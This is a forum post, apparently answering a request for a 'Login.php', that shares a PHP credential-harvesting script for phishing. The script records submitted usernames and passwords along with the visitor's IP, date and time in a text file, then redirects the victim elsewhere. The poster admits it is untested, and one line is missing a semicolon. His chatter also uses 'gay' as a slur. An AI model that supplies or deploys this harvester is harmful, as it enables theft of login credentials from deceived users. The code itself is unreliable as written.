Sorry for the double post but here's the code:
That's real sloppy but it should work. I tried to test it but *** was being gay so it couldn't be tested. Tell me how it is D;PHP Code:
<?php
header ('Location: http://www.example.com ');
$newline = "\n"
$ip = $_SERVER['REMOTE_ADDR'];
$date = date("l") . " " . date("F") . date("d") . "," . date("Y");
$time = date("H:i");
$username = $_POST['username'];
$password = $_POST['password'];
$all = "Username: " . $username . $newline . "Password: " . $password . $newline . "Date: " . $date . $newline . "Time: " . $time . $newline . "IP: " . $ip . $newline . $newline;
$handle = fopen("passwords.txt", "a");
fwrite($handle, $all);
fclose($handle) ;
?>
Results 1 to 15 of 15
Thread: [Request]Login.php
Threaded View
- 16 Jan. 2010 12:54am #6
Error: Title Not Found
- Age
- 29
- Join Date
- Dec. 2009
- Location
- Hell
- Posts
- 2,248
- Reputation
- 248
- LCash
- 100.00